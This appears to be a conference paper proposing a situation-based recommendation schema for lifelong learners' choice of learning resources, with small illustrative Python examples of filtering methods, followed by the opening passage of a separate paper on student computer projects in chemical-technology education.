Although the concept of lifelong learning (LLL) has evolved, the core idea behind it remains: an individual needs to update the competencies obtained through formal education. The necessity to refresh or master new skills and knowledge and to develop new competencies is driven by societal and economic changes, such as transformations in technologies and industries and shifting priorities in business and society. Learning through life, using the offerings of educational organizations, but also the non-formal and informal learning available from communities of learning and practice, as well as a variety of digital learning resources, changes the role and responsibility of the learners. Whereas formal education provides carefully planned and designed programs of study, non-formal and informal learning relies on a variety of unconnected sources and resources, which have to be found, evaluated, and selected by the learners themselves, or with the assistance of some recommender [1].
Recently, LLL has come to be understood as a concept embracing all forms of personal and professional development taking place through education, training, self-study, and communication, as well as personal learning experience and other activities [2]. In [3], LLL is seen as a voluntary and self-motivated pursuit of knowledge, which facilitates personal development, social inclusion, and employability. One of the specific features of LLL lies in the central role of a self-motivated person, who is in control of his/her learning process and voluntarily chooses learning experiences according to his/her personal goals and needs. Lifelong learners are self-determined, responsible, and skillful in learning strategies; however, they may expect more attention to their learning habits, preferences, and expectations [4]. They need control over their learning process and related decision-making, and expect their individual learning path to be effective, efficient, and aligned with their previous experience [5]. An important factor for successful learning is the learner's engagement, which is facilitated by an appropriate combination of learning activities, the relevancy and quality of the content, and the learner's curiosity [6]. LLL is supported by open educational resources (OER) and massive open online courses (MOOC), which enable unsupervised individual learning and scheduled learning with a possibility of communication among course members, respectively. MOOCs are delivered by some learning management system and thus can collect information about the learning process. OERs exist in different formats, including course materials and components of various sizes, tests and quizzes, video and audio material, educational games, and other educational software [7]. OERs may be produced by professional educators or by other people sharing their knowledge and experience, like the videos one can find on YouTube. While looking for a new learning experience, a learner could benefit from advice about a potentially useful resource obtained from a trusted source or agency [8, 9] that can evaluate possible options owing to its understanding of the learner's needs and learning habits. This kind of intelligent support could be provided by a recommendation system (RS). An RS is designed to assist in the selection of objects which could be of interest to a certain user by processing information about previous object choices of this or similar users. The general idea behind recommendation techniques is that people do not change their preferences, so if users selected the same (or similar) objects in the past, their next choices will be alike. Most RS applications are related to sales and marketing, but other fields beyond commerce are getting attention, including entertainment (choice of news [10], music, or movies [11]), travel planning [12], and education [13, 14]. Resource recommendation in higher education enables adaptation to the learner's expected preferences, thus taking into account not only learning objectives (what to learn) but also learning styles (how to learn). The RS could be considered an advisor supporting decision-making based on information about the person and on experience in the field, i.e., the popularity of objects, typical preferences, feedback about the objects, etc.
The majority of educational RSs make use of the information available from the learning management system, such as descriptions of learning resources, their registered use by the learners, and learners' features (age, gender, group, learning style, assessments). Their recommendations often
assume the similarity of learners within a group or studying the same discipline [15, 16]. Other potential sources of information are social networks and direct feedback from the user with an evaluation of the recommendation quality. The quality of recommendations depends on the availability of relevant information, which may be an issue for LLL, as the range of learning resources is wider, similarities with other users may be unclear or unknown, and information about the use of the resources is distributed. Depending on the learning goal, a successful recommendation algorithm may take into account professional ratings, didactical features, and the individual preferences and demands of the learner [17]. The purpose of this work is to explore the possibilities of providing intelligent support for lifelong learners in their choice of educational resources by means of an information technology implementing recommendation methods based on the information available in each situation. To do this, the LLL task should be analyzed and specific situations for recommendations identified. For the task of obtaining recommendations, these situations outline the potentially available information for the selection of suitable learning resources; therefore, they can be matched with the recommendation methods applicable in each situation. Then a recommendation framework for LLL can be created. The paper is arranged as follows. The "Materials and Methods" section contains a description of the research steps, including the literature research and the focus group discussion that lead to the main findings. The "Results" section describes the analysis of lifelong learning situations and a schema for lifelong learning recommendation. In the "Discussion," the results are analyzed and discussed to outline further directions.
2 Materials and Methods

This research combines a focus group study, as a preliminary stage for the distribution of an open online questionnaire, with literature research within full-text academic sources over a 10-year period using combinations of the keywords "recommendation (technique, method, system)" and "e-learning (LLL)". The research steps are described below. The LLL concept embraces a wide range of learning experiences, activities, and resources which are subject to various learning strategies. As mentioned in [18], depending on the purpose of study, self-directed learners may use one of the following strategies: goal-oriented, activity-oriented, or learning-oriented. To further explore different cases of LLL in the context of potential recommendations, a set of examples was collected using social networks and through informal communication with people who reported their individual e-learning cases. The cases of LLL collected during the study include, among others: receiving a certificate for advanced teacher training in MOODLE and a badge for annual security retraining using an international distance course; studying several MOOCs both for fun and for professional development; following TEC conferences and several podcasts; learning some gardening (cooking) skills by watching YouTube videos and reading guides; learning the history of Portugal in connection with a planned trip using a range of sources in several languages; discussing a programming issue on a professional forum; playing with several resources and tools to enhance English pronunciation and listening comprehension; and the like. The collected examples were grouped according
to the specified goal of the learning activity into four groups. Three of these groups could be mapped to the strategies suggested in [18]. Then a description of an LLL situation for each group was formulated. To better understand which resource features are important for the choice, a focus group comprising people of different ages with some experience in e-learning was formed. The focus group members have an education level of no less than a Master's degree and belong to the research and educational community. The members were chosen on the basis of voluntary participation and the ability to work as a team to prepare guidelines for the field experiments. A basic questionnaire drafted by the researchers was offered via an anonymous Google form to the focus group members, who then took part in a discussion of the collected answers. To simplify the discussion, the VARK (visual-audio-reading-kinesthetic) inventory [19] and other learning style models were introduced to the focus group members, so that they were able to determine their learning styles [20]. The primary purpose of the discussion was to outline the main features of the four learning situations. Another output of the discussion was a list of recommendations that should be taken into account when conducting a large-scale study beyond the focus group. These recommendations concern the reconstruction of the questionnaire, because style preferences and the importance of certain parameters depend on the situation. They also impact the recommendation schema, introducing the idea of grading the importance of information. To determine a primary recommendation method applicable to each situation, literature research was performed using Google Scholar as the primary database. Full-text articles from academic sources (peer-reviewed journals, DOI) were considered. First, an overview of the major techniques and methods was performed. Two main classes of recommendation techniques were considered: content-based filtering [21, 22], which takes into account content structure, features, and domain ontology, and collaborative filtering (CF), which relies on resource usage data and models [23, 24]. The CF method is the most popular when creating RSs. This approach is based on the assumption that if person A has the same opinion as person B on some issue, then A is more likely to share B's opinion on a different issue than the opinion of a randomly selected person. Using the CF method, it is possible to obtain recommendations based on templates without using additional information about either the items or the users. The most convenient input is high-quality explicit feedback, where users directly report their interest in products. To establish recommendations, CF systems need to link two fundamentally different entities: items and users. The simplest and most popular method for comparing the similarity of the vectors describing two users (attributes) is to calculate the correlation coefficient of these vectors of dimension n. In content-based RSs, the algorithm matches the attributes of a user's profile, which stores preferences and interests, with the attributes of a content object in order to recommend new items of interest to the user [25]. This can be done using one of the well-known metrics, for example, the Euclidean distance between the two vectors that describe the two attribute sets.
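To make these two similarity computations concrete, a minimal Python sketch follows. The tiny ratings matrix and attribute vectors are invented for illustration, and treating zero as "not rated" is our assumption rather than a convention from the cited works:

```python
import numpy as np

# Toy ratings matrix: rows = users, columns = learning resources; 0 = not rated.
R = np.array([[5, 4, 1, 0],
              [4, 5, 2, 1],
              [1, 2, 5, 4]], dtype=float)

def pearson(u, v):
    # Correlate only over resources that both users have rated.
    mask = (u > 0) & (v > 0)
    if mask.sum() < 2:
        return 0.0
    return float(np.corrcoef(u[mask], v[mask])[0, 1])

# Collaborative filtering: user-user similarity via the correlation coefficient.
print([round(pearson(R[0], R[j]), 2) for j in (1, 2)])  # [0.84, -1.0]

# Content-based variant: Euclidean distance between attribute vectors.
profile = np.array([1.0, 0.2, 0.0])   # user-profile attributes
item = np.array([0.9, 0.3, 0.1])      # resource attributes
print(round(float(np.linalg.norm(profile - item)), 3))  # smaller = closer match
```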
In model-based content filtering, recommendations are typically provided item by item by first developing a model of user ratings. These algorithms often use a probabilistic approach. A Bayesian classifier considers each attribute and the class label as (continuous or discrete) random variables. Given a record with N attributes (A1, A2, …, AN), the goal is to predict a class Ck by finding the value of Ck that maximizes the posterior probability of the class given the data, P(Ck | A1, A2, …, AN). Applying Bayes' theorem, P(Ck | A1, A2, …, AN) ∝ P(A1, A2, …, AN | Ck) P(Ck). The Bayesian classifier [26] is a probabilistic framework for solving classification problems based on the definition of conditional probability and the Bayes theorem. Another commonly used model-based method in RSs is neural networks [27]. The difference from other modeling methods is the absence of an explicit model and the need for constant network retraining, which works well for large collections of simple objects. Since personalized RSs are highly dependent on the context or domain in which they operate, it is impossible to take a recommender system from one context and transfer it to another context or domain [28]. Further, the application of these methods in e-learning and LLL recommendations in particular was explored. For this purpose, an analysis of publications on RS applications for LLL using Google Scholar was carried out; it showed that although several RSs were reported as supporting individual self-directed learning, their effectiveness has been evaluated only within the higher education environment. Some research is focused on specific issues of information structuring or elicitation, such as the preprocessing of information about the learning content and users, e.g., creating a taxonomy [29] of user profiles or an ontology for course content description [30]. Another approach is related to the extraction and formalization of descriptive information about a learning resource or its structure [31]. A combination of memory-based recommendation methods that seems appropriate for implementing personalized recommendations of learning activities is proposed in [32]. Learning networks in this case provide a basis for collaborative filtering. Based on the analysis of recommendation techniques and supporting methods, the primary recommendation method for each LLL situation has been suggested. Then, the main stages of LLL recommendation of learning resources were identified.
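As an illustration of the naive Bayesian formulation above, the following self-contained sketch predicts whether a learner will "like" a resource from two discrete attributes. The data, the attribute set, and the use of Laplace smoothing are our own illustrative choices, not taken from the cited works:

```python
# Toy naive Bayes: score each class by P(C) * prod_i P(A_i | C).
from collections import Counter, defaultdict

# (format, duration) attribute pairs with a "liked" label from past history.
history = [(("video", "short"), 1), (("video", "long"), 1),
           (("text", "long"), 0), (("text", "short"), 1),
           (("video", "long"), 0), (("text", "long"), 0)]

labels = Counter(lbl for _, lbl in history)
counts = defaultdict(Counter)  # counts[(attr_index, label)][value]
for attrs, lbl in history:
    for i, val in enumerate(attrs):
        counts[(i, lbl)][val] += 1

def posterior(attrs, lbl, alpha=1.0):
    # Proportional to P(C_k | A_1..A_N) under the naive independence assumption.
    p = labels[lbl] / sum(labels.values())
    for i, val in enumerate(attrs):
        c = counts[(i, lbl)]
        # Laplace smoothing; each attribute here has exactly 2 possible values.
        p *= (c[val] + alpha) / (sum(c.values()) + alpha * 2)
    return p

candidate = ("video", "short")
scores = {lbl: posterior(candidate, lbl) for lbl in labels}
print(max(scores, key=scores.get), scores)  # the class with the highest posterior wins
```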
3 Results

3.1 Lifelong Learning Situations

As a result of the study of LLL cases, the following situations were identified:

(a) Professional development. A person needs a confirmed result of training in a certain field, e.g., web design. In this case, the recommendation is expected to be a course or a program containing content, activities, assignments, and assessment, leading to a proof of competency (diploma, badge, or certificate).

(b) Personal development. A person needs to learn how to solve a problem or perform some task. A recommendation may include various types of resources for knowledge/skills acquisition, including videos for microlearning.
(c) Curiosity-led study. There are many reasons for learning that have no direct connection to immediate application. It may be a hobby, an attempt to clarify details, a wish to enhance understanding, or just staying aware of technological advancements. This kind of learning may be supported by various resources, from edutainment to research: passive presentations, interactive videos, games, and quizzes. The difference between this case and the previous two is that here the learner does not need to but wants to learn.

(d) Skills reinforcement or knowledge refreshing. This is a specific LLL situation that has not been sufficiently addressed yet. It reflects the fact that, whether the knowledge domain is changing or not, mastered knowledge degrades over time and needs to be refreshed, and skills should be practiced to ensure the desired performance. Obviously, the learning content and strategy for this case may differ from those used for initial learning or training; thus, a different resource should be recommended.

Table 1 presents some distinct features of the situations that determine the type and source of information necessary for a successful learning resource recommendation.

Table 1. Distinct features of the LLL situations

| Feature | a | b | c | d |
|---|---|---|---|---|
| Learning goal | Certificate | Competence to perform a task | Cognitive satisfaction | Refreshed skills or knowledge |
| Resource type | LMS-based course (content, activities, and assessment) | Short module to micro-lesson, with demo and activities | Micro to medium size multimedia content | A collection of micro-activities and learning content |
| Learner info | For pre-condition | Task context | Preferences, style | Learning history, learner model |
| Resource info | Resource facts, data to compare | Duration, type, [style] | Source, style | Type of learning activity |
| Advice from | Authority | Prof. majority | Friend or self | Instructor and self |
| Evaluation (test) | + | + | − | ± |
| Dialog during the choice | Course details, explanation of choice, feedback | Context-related | Demo (optional) | Link to didactic reasons if needed |
| Recommendation | Multicriteria choice | Collaborative filtering | History-based content filtering | Model-based content filtering |
Preliminary results demonstrated that most participants prefer the freedom to choose their learning experience and flexibility of the learning path, and the majority prefer text-based or visual resources. For a large-scale study of the potential importance of certain resource characteristics and of the preferred parameter values, some changes to the questionnaire were proposed. First, in order to obtain more accurate answers about the learner's preferences, the questionnaire should begin with the indication of a particular situation or learning goal. Second, to reduce communication time, it should be hierarchical, so that less important resource features are not discussed in detail. Finally, some guidelines or examples of how to fill in the free-form questions were considered. The features of the situations described above are summarized in the rows of Table 1. The learning goal characterizes the reason for learning and, thus, the expected result. The typical resource type features the learning resources appropriate for reaching the learning goal, although other types of resources and their combinations could be considered. Information about the resource describes the characteristics important in each situation, such as correspondence to the learning style, the type/amount of learning activities, or the duration of study. Similarly, learner information identifies what should be known about a person obtaining a resource recommendation; the most relevant items are shown for each case. The "Advice from" row describes potential recommenders in the real world, i.e., persons whose advice the learner would most probably accept, thus outlining a similar group for a recommendation method. This information is helpful for user clustering in an RS. The dialog during the choice reflects the specifics of educational recommendations compared to sales or music recommendations. The last row shows the primary method for resource recommendation identified by a comparative analysis of the potentially available information about the learner, the advisory group (user cluster), and the learning resources. As one can see, for situation (a) the resources belong to one type, but their descriptions and ratings may be available from several sources. In the other situations, the recommended resources could belong to different types, such as a module of a distance course or a video lecture, and thus have different features which are hard to compare. Obviously, for an accurate resource recommendation, a learning objective articulated as a required competency or topic should be known, as well as some information about the learner. RSs are applied to simplify the choice among a large set of similar objects.

3.2 A Recommendation Schema for Lifelong Learning

As discussed above, a spectrum of methods and techniques is needed to process the information available in each case for suggesting resources for LLL. The main phases of information processing are outlined below.

Phase 1. A Preliminary Search. Usually, an RS evaluates the resources for a user from a collection in which any resource could be of potential interest. In LLL, learners have different interests that, taken together, may be fulfilled by many collections and repositories. Therefore, the purpose of this phase is to determine an initial collection for the RS using the learner's request, basic information from his/her profile, and contextual information if needed. Federated search mechanisms can be applied.
Phase 2. A Preliminary Analysis. This phase is necessary to detail, enrich, and normalize information before processing. Depending on the case, it might include the extraction of detailed resource metadata, obtaining specific learner preference information, matching metadata vocabularies from different sources, converting descriptive information into a numerical data format for calculations, or normalizing resource ratings obtained from various sources.

Phase 3. A Recommendation. The chosen recommendation method(s) is (are) applied using the enriched and normalized data. Models are built here that can be used both to analyze the current situation and to predict behavior in the future. The result of this phase is one or several learning resources with their descriptions and ratings of some sort. A justification of the recommendation might be requested.

Phase 4. Evaluation and Collecting Feedback. The purpose of this phase is twofold: first, to evaluate the quality of the recommendation, and second, to obtain detailed feedback about the resource features that might be of interest to other learners. The recommendation of a learning resource could be considered successful if the learner accepted and used it, learned from it, and was satisfied with both the process and the result of the learning. It is possible to single out the main stages of such a technology (Fig. 1). Thus, the main ideas behind the described schema are: (1) to produce a quality recommendation, the learner's expectations in the current learning-related situation have to be understood; (2) instead of using all available data at once, the processing should start with the most important information and attract additional information as needed; (3) recommendations in learning should not be intrusive or binding, i.e., the learner must be able to make his/her own decision; (4) the collection and use of different types of user data should be justified by the task.
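A skeletal rendering of these four phases is sketched below. It is our own structuring of the schema, not the authors' implementation; all helper functions are stubs standing in for real search, normalization, and ranking components:

```python
# A sketch of the four-phase schema; every component here is a placeholder.
def preliminary_search(query, situation):
    # Phase 1: federated search across repositories chosen for the situation (stub).
    return [{"id": "r1", "rating": 4.5}, {"id": "r2", "rating": 3.9}]

def preliminary_analysis(resources):
    # Phase 2: enrich/normalize metadata and ratings to a common [0, 1] scale.
    return [{**r, "rating": r["rating"] / 5.0} for r in resources]

def recommend(situation, profile, resources):
    # Phase 3: dispatch to the situation's primary method (Table 1, last row);
    # real systems would plug in distinct methods, stubbed here as one ranking.
    rank = lambda rs: sorted(rs, key=lambda r: r["rating"], reverse=True)
    methods = {"a": rank, "b": rank, "c": rank, "d": rank}
    return methods[situation](resources)

def collect_feedback(store, resource_id, accepted, satisfied):
    # Phase 4: record whether the recommendation was accepted and satisfying.
    store.setdefault(resource_id, []).append((accepted, satisfied))

store = {}
found = preliminary_search("python security", "b")        # Phase 1
ranked = recommend("b", {}, preliminary_analysis(found))  # Phases 2-3
collect_feedback(store, ranked[0]["id"], True, True)      # Phase 4
print(ranked[0]["id"], store)
```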
4 Discussion

Considering the LLL situations, the main challenges for intelligent support of learning resource selection may be summarized as follows. First, lifelong learners are not bound to one organization in their choice of learning resources, so the developers of an RS cannot rely on a collection of resources and their evaluations created in advance in a format appropriate for processing by some recommendation method (algorithm). As a result, depending on the situation, a distributed search over several repositories containing different types of resources may be necessary (in contrast to the search within one collection of unified objects, as in most RSs). Information about these resources consists of metadata and user evaluations. Although metadata formats are standardized, not all metadata fields are mandatory, so missing data have to be filled in by additional information extraction about the resource or compensated by other available information. The quality of the resource description has a direct impact on the quality of recommendations; however, excessive information slows down processing and might have the effect of noise.
Fig. 1. Stages of recommendation technology in LLL
Second, collaborative filtering methods use resource evaluations by similar or trusted users. The identification of a group of potentially trusted users was depicted in the "Advice from" row. A specific procedure for determining whether a user belongs to this group is also subject to the situation.
Third, user evaluations and feedback about the quality of recommendations should be collected. In contrast to product recommendations, which are based on binary feedback or simple ratings, a more complex schema is necessary for learning resources. Finally, the ultimate goal of the LLL recommender is to support learners on their individual lifelong learning path, so their previous learning experiences should be taken into account to the extent possible, and their learning needs identified. In some educational RSs, a registration mechanism provides access to the learner data from the LMS. In the case of LLL, a registration mechanism could provide access to basic data and request additional data from the learner profile or learner model through the learner agent. The choice of the primary recommendation method for each specific situation (the last row of Table 1) is driven by the following considerations:

(a) Professional development: a multicriteria choice that incorporates preference information over multiple criteria. Instead of the single criterion value typical for RSs, optimization by two or more criteria is used. This situation is similar to a usual e-learning case; thus, a comparative study of optimization methods and recommendation methods could be proposed as a separate research topic;

(b) Personal development: collaborative filtering (CF). The opinion of other learners who used a certain resource for a similar learning objective will be valuable in this situation;

(c) Curiosity-led study: history-based content filtering. Unlike collaborative filtering, content-based filtering does not need data from other users to create recommendations but relies on descriptions of the resources' features. Content-based recommenders can be carefully tailored to the user's interests;

(d) Skills reinforcement or knowledge refreshing: model-based content filtering. These methods provide item recommendations by first developing a model of user ratings. Algorithms in this category can use a probabilistic approach to compute the potential value of an item for a user, given his/her ratings of other items.

It should be noted that certain resource features may be unknown, as may users' characteristics. The rules for calculating the best fit depend on the availability of information about the user's explicit requirements, expectations derived from his/her previous experience, preferences determined in a dialog, pedagogical rationale, and other factors. Considering the advantages and disadvantages of the RS techniques summarized in [21, 24], and the variety of methods applied to elicit additional information from the available data and to transform and structure it to increase the accuracy of recommendations, it seems reasonable to explore their combination. As shown in the review [33], hybrid RSs, which combine different approaches, e.g., content filtering and collaborative filtering, or ontological search support, constitute the core of recent research publications in this field. The authors also consider a smart combination of information and methods in the field of RSs as a way to increase the quality of recommendations. However, the structure and methods of the experimental part of quality and accuracy evaluation should be researched and planned in advance, taking into account the lifelong learning environment. It is planned that the end result of this investigation will be an information technology to support the user's decision when choosing a learning resource. During the operation of this
technology, it may be necessary to obtain new additional information about the resource or about users who have previously taken the course and can be assigned to one of the user groups (according to the situation). If the received recommendation is unsatisfactory for the user, it may be necessary to involve more complex data processing methods, if the initial data allow it, which may increase the accuracy of the result obtained. If there is not enough data for a given user, the system may display information about an error or about the need to obtain new additional information (for example, by asking the user to fill out additional questionnaires about his/her wishes when choosing a resource).
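To make the multicriteria choice of situation (a) more tangible, here is a toy weighted-sum scoring in Python; the criteria, weights, and course entries are illustrative assumptions, not values from the study:

```python
# Toy multicriteria choice: each criterion is pre-normalized to [0, 1],
# higher = better (e.g., cost is inverted upstream so cheap courses score high).
courses = {
    "Course X": {"certificate": 1.0, "rating": 0.9, "cost": 0.4, "duration": 0.7},
    "Course Y": {"certificate": 1.0, "rating": 0.7, "cost": 0.9, "duration": 0.5},
}
weights = {"certificate": 0.4, "rating": 0.3, "cost": 0.2, "duration": 0.1}

def score(criteria):
    # Weighted sum over all criteria of one course.
    return sum(weights[k] * v for k, v in criteria.items())

best = max(courses, key=lambda name: score(courses[name]))
print(best, {name: round(score(c), 2) for name, c in courses.items()})
```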
5 Conclusions

At this stage of the research, the objective was to identify and describe specific cases in which recommendation methods can be realized in an information technology providing intelligent support for lifelong learners in their choice of learning resources. Intelligent support is understood as a recommendation similar to one that could be provided by a person the lifelong learner trusts; depending on the situation, this could be his/her supervisor, a friend, or a guru in some field. The authors identified four distinct situations by collecting responses to the questionnaire and discussing the results in a small focus group of people with lifelong learning experience. Then, for each situation, recommendation techniques were considered for their relevance, taking into account the potentially available information and the fact that, in most cases, LLL takes place in an open environment. The novelty of the approach lies in using the learning goal as a basis for describing the specific situations related to the recommendation request, which impact the choice of the primary recommendation method. The proposed general schema enables a combination of several recommendation methods and adaptation to the amount and quality of the input information. It outlines the main stages of an information technology for lifelong learning recommendations; however, further elaboration is needed to identify specific requirements for components to interoperate with existing learning resource metadata, repositories, and learner data. As this paper introduces the first stage of the research, it does not contain details of the RS literature analysis or a large-scale study of lifelong learners' preferences. The suggested types of LLL situations provide a general context for recommender construction. Due to essential differences in the amount and type of information available for selecting and recommending resources in each LLL situation, each case requires a separate study and evaluation of the recommendation methods. Further research will focus on these issues, including the elaboration of the information structure and schema of the recommendation system for lifelong learning.
References

1. Grytsenko, V.I., Kudriavtseva, S.P., Synytsya, K.M.: Learning task models in the context of education for sustainable development. Control Syst. Comput. 5, 3–16 (2020). https://doi.org/10.15407/csc.2020.05.003
2. Salling Olesen, H.: The invention of a new language of competence – a necessary tool for a lifelong learning policy. In: Duvekot, R., Joong Kang, D., Murray, J. (eds.) Linkages of VPL: Validation of Prior Learning as a Multi-Targeted Approach for Maximising Learning Opportunities for All. EC-VPL (VP), pp. 37–44 (2014)
3. Lifelong Learning. https://www.valamis.com/hub/lifelong-learning
4. Fiedler, S.H., Väljataga, T.: Modeling the personal adult learner: the concept of PLE reinterpreted. Interact. Learn. Environ. 28(6), 658–670 (2020)
5. Moore, R.L.: Developing lifelong learning with heutagogy: contexts, critiques, and challenges. Distance Educ. 41(3), 381–401 (2020). https://doi.org/10.1080/01587919.2020.1766949
6. Buncle, J., Anane, R., Nakayama, M.: A recommendation cascade for e-learning. In: 27th IEEE International Conference on Advanced Information Networking and Applications (AINA-2013), pp. 740–747. IEEE, Barcelona, Spain (2013). https://doi.org/10.1109/AINA.2013.142
7. Ossiannilsson, E.: OER and OEP for access, equity, equality, quality, inclusiveness, and empowering lifelong learning. Int. J. Open Educ. Resour. 1(2), 131–154 (2019). https://doi.org/10.18278/ijoer.1.2.8
8. Dabbagh, N., Castaneda, L.: The PLE as a framework for developing agency in lifelong learning. Educ. Tech. Res. Dev. 68(6), 3041–3055 (2020). https://doi.org/10.1007/s11423-020-09831-z
9. Deschênes, M.: Recommender systems to support learners' agency in a learning context: a systematic review. Int. J. Educ. Technol. High. Educ. 17(50), 1–23 (2020)
10. Raza, S., Ding, C.: News recommender system: a review of recent progress, challenges, and opportunities. Artif. Intell. Rev. 55(1), 749–800 (2021). https://doi.org/10.1007/s10462-021-10043-x
11. Kleć, M., Wieczorkowska, A.: Music recommendation systems: a survey. In: Ras, Z.W., Wieczorkowska, A., Tsumoto, S. (eds.) Recommender Systems for Medicine and Music. SCI, vol. 946, pp. 107–118. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-66450-3_7
12. Khoshahval, S., Farnaghi, M., Taleai, M., Mansourian, A.: A personalized location-based and serendipity-oriented point of interest recommender assistant based on behavioral patterns. In: Mansourian, A., Pilesjö, P., Harrie, L., van Lammeren, R. (eds.) AGILE 2018. LNGC, pp. 271–289. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-78208-9_14
13. Joy, J., Pillai, R.V.G.: Review and classification of content recommenders in e-learning environment. J. King Saud Univ. Comput. Inf. Sci. 34(9), 7670–7685 (2022). https://doi.org/10.1016/j.jksuci.2021.06.009
14. Drachsler, H., Hummel, H., Koper, R.: Identifying the goal, user model and conditions of recommender systems for formal and informal learning. J. Digit. Inf. 10(2), 4–24 (2009)
15. Jawaheer, G., Weller, P., Kostkova, P.: Modeling user preferences in recommender systems: a classification framework for explicit and implicit user feedback. ACM Trans. Interact. Intell. Syst. 4(2), 1–26 (2014)
16. Khosravi, H., Kitto, K., Williams, J.J.: RiPPLE: a crowdsourced adaptive platform for recommendation of learning activities. J. Learn. Anal. 6(3), 1–10 (2019). https://arxiv.org/pdf/1910.05522.pdf
17. Bulathwela, S., Perez-Ortiz, M., Yilmaz, E., Shawe-Taylor, J.: Towards an integrative educational recommender for lifelong learners. In: Proceedings of the AAAI Conference on Artificial Intelligence, vol. 34, no. 10, pp. 13759–13760 (2020)
18. Lalitha, T.B., Sreeja, P.S.: Personalised self-directed learning recommendation system. Procedia Comput. Sci. 171, 583–592 (2020)
19. The VARK Questionnaire. https://vark-learn.com/the-vark-questionnaire/
20. Zagulova, D., Boltunova, V., Katalnikova, S., et al.: Personalized e-learning: relation between Felder-Silverman model and academic performance. Appl. Comput. Syst. 24(1), 25–31 (2019)
21. Isinkaye, F.O., Folajimi, Y.O., Ojokoh, B.A.: Recommendation systems: principles, methods and evaluation. Egypt. Inform. J. 16(3), 261–273 (2015). https://doi.org/10.1016/j.eij.2015.06.005
22. Shu, J., Shen, X., Liu, H., Yi, B., Zhang, Z.: A content-based recommendation algorithm for learning resources. Multimedia Syst. 24(2), 163–173 (2017). https://doi.org/10.1007/s00530-017-0539-8
23. Koren, Y., Bell, R.: Advances in collaborative filtering. In: Ricci, F., Rokach, L., Shapira, B. (eds.) Recommender Systems Handbook, pp. 77–118. Springer, Boston, MA (2015). https://doi.org/10.1007/978-1-4899-7637-6_3
24. Kunaver, M., Požrl, T.: Diversity in recommender systems – a survey. Knowl.-Based Syst. 123, 154–162 (2017)
25. Deshpande, M., Karypis, G.: Item-based top-N recommendation algorithms. ACM Trans. Inf. Syst. 22(1), 143–177 (2004)
26. Cheng, J., Greiner, R.: Comparing Bayesian network classifiers. arXiv preprint arXiv:1301.6684 (2013). https://arxiv.org/ftp/arxiv/papers/1301/1301.6684.pdf
27. Gao, C., Wang, X., He, X., Li, Y.: Graph neural networks for recommender system. In: Proceedings of the Fifteenth ACM International Conference on Web Search and Data Mining, pp. 1623–1625 (2022)
28. Kulkarni, P.V., Rai, S., Kale, R.: Recommender system in elearning: a survey. In: Bhalla, S., Kwan, P., Bedekar, M., Phalnikar, R., Sirsikar, S. (eds.) Proceeding of International Conference on Computational Science and Applications. AIS, pp. 119–126. Springer, Singapore (2020). https://doi.org/10.1007/978-981-15-0790-8_13
29. Ponte, M.C.U., Zorilla, A.M., Ruiz, I.O.: Taxonomy-based hybrid recommendation system for lifelong learning to improve professional skills. In: 2020 IEEE International Conference on Teaching, Assessment, and Learning for Engineering (TALE), pp. 595–600 (2020)
30. Urdaneta-Ponte, M.C., Méndez-Zorrilla, A., Oleagordia-Ruiz, I.: Lifelong learning courses recommendation system to improve professional skills using ontology and machine learning. Appl. Sci. 11, 3839 (2021). https://doi.org/10.3390/app11093839
31. Wan, S., Niu, Z.: An e-learning recommendation approach based on the self-organization of learning resource. Knowl.-Based Syst. 160, 71–87 (2018)
32. Drachsler, H., Hummel, H.G.K., Koper, R.: Personal recommender systems for learners in lifelong learning networks: the requirements, techniques and model. Int. J. Learn. Technol. 3(4), 404–423 (2008). https://doi.org/10.1504/IJLT.2008.019376
33. Souabi, S., Retbi, A., Idrissi, M.K., Bennani, S.: Towards an evolution of e-learning recommendation systems: from 2000 to nowadays. Int. J. Emerg. Technol. Learn. 16(06), 286–298 (2021). https://doi.org/10.3991/ijet.v16i06.18159
Training IT Experts in Universities
Creating Applied Computer Developments in the Educational Process in the Training of Chemists-Technologists

Olga Sergeyeva and Liliya Frolova(B)

Ukrainian State University of Chemical Technology, Dnipro, Ukraine
[email protected]
Abstract. Independent work (in the form of applied developments) shapes, in students of different fields of study, professionally oriented skills, communication skills in cooperation, and customer-contractor relationship skills within the active cognitive creative activity of students. The object of research is the process of creating computer developments related to chemical technology. The subject of research is the interaction of students of different specialties. This approach exercises all the functions of independent work, i.e., the cognitive, prognostic, educational, corrective, and independent ones. It should be noted that this approach significantly broadens the horizons of the students-performers. In addition, it increases students' self-esteem and self-confidence. It is established that the most expedient tasks for students majoring in 123 - Computer Engineering are the development of computer simulators of laboratory installations or production lines, of specialized computer systems for experiments or laboratories, and of computer systems for process monitoring.

Keywords: Independent work of students · technological process · applied computer developments · computer engineering
1 Introduction

In the future, students and teachers will need to respond in a timely manner to changes in the environment and in society. Their further success on the chosen path depends on the quality of the students' education. Therefore, cooperation between teachers and students of different fields of study, in order to broaden their horizons and help them gain practical skills, becomes a relevant issue. For example, the possibility of professional growth of teachers and lecturers has been considered [1–3]. Given the complex tasks to be solved by both the teacher-technologist and the student, it is obviously necessary to involve students in scientific and practical activities, to create the conditions participants need to realize their abilities and talents, and to promote interdisciplinary learning. As part of undergraduate practice, students need to develop technological schemes, study the properties of new substances, and model processes [4, 5].
In addition, the future professional activities of most students will be associated not only with the use and development of computer technology, but also with communication with customers. Moreover, the use of computer technology in the educational process opens up great opportunities for the development of cognitive abilities, from sensory-perceptual to speech-mental forms. However, these opportunities are significantly limited in the areas of values, motivation, goal setting, and other aspects of the human psyche [6, 7], so it is necessary to maintain professional cooperation between students and graduate students.

The above can be classified as independent work of students. The concept of "independent work" can be considered in two senses: 1) as an active cognitive creative activity of the student, present in any type of study; 2) as one of the types of training sessions conducted under the guidance of a teacher but without his personal participation. It has been established [8] that only the knowledge that students have acquired independently, through their own experience, thoughts, and actions, will be really durable. In the process of teaching educational material, 15% of the information perceived by ear is assimilated, and 65% is assimilated by hearing and sight together. At the same time, if the educational material is processed independently (individually), then at least 90% of the information is assimilated. The main functions of independent work of students are given in Table 1. Expanding the functions of independent student work [9] not only increases its importance, but also changes the relationship between teacher and student into one of equal subjects of educational activity, i.e., it adjusts all the psychological and pedagogical means of independent student work and cooperation. The work [10] analyzes the importance of strengthening the relationship between the technical and humanitarian principles of engineering education in the renovation of higher technical schools and the training of specialists with a set of competencies corresponding to the challenges of the fourth industrial revolution.

Table 1. Functions of independent work of students

Function | Definition
Independent | Formation of skills and abilities, their independent updating, and their creative application
Cognitive | The student's mastery of systematic knowledge of the disciplines
Prognostic | The students' ability to predict and evaluate possible results in time
